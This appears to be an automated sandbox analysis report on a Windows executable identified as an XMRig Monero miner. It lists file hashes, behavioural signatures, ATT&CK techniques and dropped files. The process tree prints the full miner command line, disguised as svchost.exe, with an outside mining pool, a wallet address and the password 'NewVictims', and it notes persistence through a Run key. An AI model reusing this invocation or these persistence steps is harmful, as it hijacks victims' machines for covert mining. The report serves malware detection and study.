Analysis

  • max time kernel
    152s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    16-05-2022 12:54

General

  • Target

    6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe

  • Size

    19.7MB

  • MD5

    59d485e89a3c1b7e0fd31aeaa01c4a26

  • SHA1

    ae6e6326ad6198add70b74e89f747f622fd1bbd3

  • SHA256

    6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398

  • SHA512

    0d3a73d86b4aed04f9257f7fccf4c6339cae7fd287f279889ce39b05b798059351175eb6538a13f9ef2cf936db241cbf4e4ff8d717793284d90cdf5d5a4eb46b

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 5 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe
    "C:\Users\Admin\AppData\Local\Temp\6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4644
    • C:\Users\Admin\AppData\Roaming\lolupdate.exe
      "C:\Users\Admin\AppData\Roaming\lolupdate.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4664
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe --opencl --cuda --donate-level=4 -B --coin=monero --url=gulf.moneroocean.stream:10128 --user=491AFfs2Fhj9c1AXyinqpn5TJTAb5JqAC1G1WAjKfTj8KAeuFHHP3USSVvFLFnw132LwCzVgfxNDmaWfXPyXDyBj4yVW3Vv --pass=NewVictims --cpu-max-threads-hint=70 --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --cuda-loader="C:\Users\Admin\AppData\Roaming\WinCFG\Libs\ddb64.dll"
        3⤵
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        PID:4060

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\WinCFG\Libs\ddb64.dll
    Filesize

    19.5MB

    MD5

    4b9507ee2bfd925468b952c57fb694ed

    SHA1

    6d46148f43d09f681ff88279ed047a7ab5cd4ea2

    SHA256

    1b2b4b6ef86fc06d680821da380232d7c7885fcbf9b9f012c46a3e2699654ba1

    SHA512

    84bc4bf118e9055f4cca9fcb974ead33b8130ced53f736ab8e75596cb2e7567d5c24db88fa4ce6a17c465775a6e618d4697a82ddac8e30b70bc269f3ab5333df

  • C:\Users\Admin\AppData\Roaming\WinCFG\Libs\ddb64.dll
    Filesize

    19.5MB

    MD5

    4b9507ee2bfd925468b952c57fb694ed

    SHA1

    6d46148f43d09f681ff88279ed047a7ab5cd4ea2

    SHA256

    1b2b4b6ef86fc06d680821da380232d7c7885fcbf9b9f012c46a3e2699654ba1

    SHA512

    84bc4bf118e9055f4cca9fcb974ead33b8130ced53f736ab8e75596cb2e7567d5c24db88fa4ce6a17c465775a6e618d4697a82ddac8e30b70bc269f3ab5333df

  • C:\Users\Admin\AppData\Roaming\lolupdate.exe
    Filesize

    19.7MB

    MD5

    59d485e89a3c1b7e0fd31aeaa01c4a26

    SHA1

    ae6e6326ad6198add70b74e89f747f622fd1bbd3

    SHA256

    6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398

    SHA512

    0d3a73d86b4aed04f9257f7fccf4c6339cae7fd287f279889ce39b05b798059351175eb6538a13f9ef2cf936db241cbf4e4ff8d717793284d90cdf5d5a4eb46b

  • C:\Users\Admin\AppData\Roaming\lolupdate.exe
    Filesize

    19.7MB

    MD5

    59d485e89a3c1b7e0fd31aeaa01c4a26

    SHA1

    ae6e6326ad6198add70b74e89f747f622fd1bbd3

    SHA256

    6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398

    SHA512

    0d3a73d86b4aed04f9257f7fccf4c6339cae7fd287f279889ce39b05b798059351175eb6538a13f9ef2cf936db241cbf4e4ff8d717793284d90cdf5d5a4eb46b

  • memory/4060-138-0x0000000140000000-0x0000000140753000-memory.dmp
    Filesize

    7.3MB

  • memory/4060-144-0x0000000140000000-0x0000000140753000-memory.dmp
    Filesize

    7.3MB

  • memory/4060-147-0x000001C2250E0000-0x000001C225100000-memory.dmp
    Filesize

    128KB

  • memory/4060-146-0x000001C2235D0000-0x000001C2235F0000-memory.dmp
    Filesize

    128KB

  • memory/4060-142-0x000001C223570000-0x000001C223584000-memory.dmp
    Filesize

    80KB

  • memory/4060-139-0x000000014029169C-mapping.dmp
  • memory/4060-140-0x0000000140000000-0x0000000140753000-memory.dmp
    Filesize

    7.3MB

  • memory/4060-141-0x0000000140000000-0x0000000140753000-memory.dmp
    Filesize

    7.3MB

  • memory/4644-130-0x0000000000E40000-0x0000000002202000-memory.dmp
    Filesize

    19.8MB

  • memory/4644-131-0x00007FFDAAF90000-0x00007FFDABA51000-memory.dmp
    Filesize

    10.8MB

  • memory/4664-132-0x0000000000000000-mapping.dmp
  • memory/4664-135-0x00007FFDAAF90000-0x00007FFDABA51000-memory.dmp
    Filesize

    10.8MB

  • memory/4664-137-0x0000000002440000-0x000000000244A000-memory.dmp
    Filesize

    40KB

  • memory/4664-136-0x0000000002450000-0x0000000002462000-memory.dmp
    Filesize

    72KB